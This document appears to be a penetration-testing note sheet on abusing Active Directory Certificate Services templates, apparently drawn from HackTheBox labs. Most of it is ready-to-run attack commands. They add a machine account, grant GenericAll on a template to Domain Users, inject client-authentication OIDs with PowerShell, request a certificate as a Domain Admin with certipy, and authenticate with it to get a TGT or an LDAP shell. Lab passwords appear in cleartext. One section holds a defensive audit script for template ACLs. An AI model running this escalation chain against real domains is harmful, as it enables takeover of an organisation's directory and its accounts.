Certificate Authority Vulnerable Cert

The vulnerable template may state that domain computers (or some other computer principal, rather than users) are allowed to enroll. In that case you need a computer account, and you can create one for this purpose.

**Find machine account quota**

```
nxc ldap authority -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M MAQ
```

**Add a computer**

```
impacket-addcomputer -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host authority -domain-netbios 'authority.htb' 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'
```

**Break out key and pem from pfx (WinRM over SSL can use certificate authentication)**

  • A pfx file holds both the public certificate and the private key.

  • evil-winrm requires these to be split into separate public-certificate and private-key files.

  • Inspect the pfx: `openssl pkcs12 -in file.pfx -info`

  • If the pfx is password-protected, `pfx2john` produces a hash for cracking.

  • Extract the private key: `openssl pkcs12 -in file.pfx -nocerts -out privkey.pem -nodes`

  • Extract the public certificate: `openssl pkcs12 -in file.pfx -nokeys -out pubcert.cert`

  • Connect: `evil-winrm -S -c pubcert.cert -k privkey.pem -i dc01`

--

**WriteDacl on Cert**

Reference: https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates

Enumerate the certificate templates in the Configuration partition:

```
ldapsearch -LLL -H ldap://htb.local -b 'cn=configuration,dc=htb,dc=local' -D 'amanda@htb.local' -w 'Ashare1972' -s sub '(objectclass=pkicertificatetemplate)' '*'
```

**Set full control to all users**

Do not do this in a pentest; grant the right to a single principal instead.

```
dsacls "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL" /G "HTB\Domain Users:GA"
```

**Add OIDs**

```powershell
# Import Active Directory Module
Import-Module ActiveDirectory

# Define the distinguished name (DN) of the certificate template
$dn = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL"

# Define the application policies to add
$policies = @("1.3.6.1.5.5.7.3.2","1.3.6.1.5.5.7.3.4","1.3.6.1.4.1.311.10.3.4")

# Get the existing application policies (if any)
$currentPolicies = (Get-ADObject -Identity $dn -Properties "msPKI-Certificate-Application-Policy")."msPKI-Certificate-Application-Policy"

# Check if there are any existing policies and merge them with the new ones
if ($currentPolicies -ne $null) { $policies += $currentPolicies | Where-Object { $_ -notin $policies } }

# Update the certificate template with the new application policies
Set-ADObject -Identity $dn -Replace @{ "msPKI-Certificate-Application-Policy" = $policies }
```
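The defensive counterpart to the WriteDacl grant and the application-policy edit above is to find templates whose ACL lets broad groups rewrite them. The following audit script is an added example, not part of this playbook; it assumes the ActiveDirectory module (and the AD: drive it registers) on a domain-joined host with read access to the Configuration partition, and the list of "broad" principals and the rights regex are my own choices.

```powershell
# Added audit example (not from the playbook): list certificate templates where broad
# principals hold rights that allow tampering with the template (ACL, owner, or all
# attributes), and show each flagged template's current application policies so that
# an unexpected Client Authentication OID (1.3.6.1.5.5.7.3.2) stands out.
Import-Module ActiveDirectory

$configNC    = (Get-ADRootDSE).configurationNamingContext
$templatesDN = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"

# Principals that should never hold write rights on a template (assumed list)
$broadPrincipals = @('Everyone', 'Authenticated Users', 'Domain Users', 'Domain Computers', 'Users')
# Rights that let the holder rewrite the template; dsacls ":GA" is GenericAll
$riskyRights   = 'GenericAll|WriteDacl|WriteOwner'
$allAttributes = [guid]::Empty   # WriteProperty with an empty ObjectType covers every attribute

Get-ADObject -SearchBase $templatesDN -LDAPFilter '(objectClass=pKICertificateTemplate)' `
             -Properties 'msPKI-Certificate-Application-Policy' |
  ForEach-Object {
    $template = $_
    $acl = Get-Acl -Path ("AD:\" + $template.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights  = $ace.ActiveDirectoryRights.ToString()
        $tampers = ($rights -match $riskyRights) -or
                   ($rights -match 'WriteProperty' -and $ace.ObjectType -eq $allAttributes)
        $who   = $ace.IdentityReference.Value
        $broad = $broadPrincipals | Where-Object { $who -like "*\$_" -or $who -eq $_ }
        if ($tampers -and $broad) {
            [pscustomobject]@{
                Template    = $template.Name
                Principal   = $who
                Rights      = $rights
                AppPolicies = ($template.'msPKI-Certificate-Application-Policy' -join ',')
            }
        }
    }
  } | Format-Table -AutoSize
```

Any row returned is a template that a low-privileged member of that group could modify; review its Security tab and remove the grant, then check the ACL and application policies against the template's intended configuration.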

**Request the cert**

```
certipy-ad req -u 'User' -p 'Password' -ca 'Certificate Authority' -template 'ESC4' -upn 'User you want the certificate for [Domain Admin]' -dc-ip 'Domain Controller IP'
```

**Use the cert to get a TGT**

```
certipy-ad auth -pfx 'The user we got the certificate for [Domain Admin]' -dc-ip 'Domain Controller IP'
```

Example with an LDAP shell instead of a TGT:

```
certipy-ad auth -pfx sizzler.pfx -dc-ip 10.129.71.105 -dns-tcp -ldap-shell
```
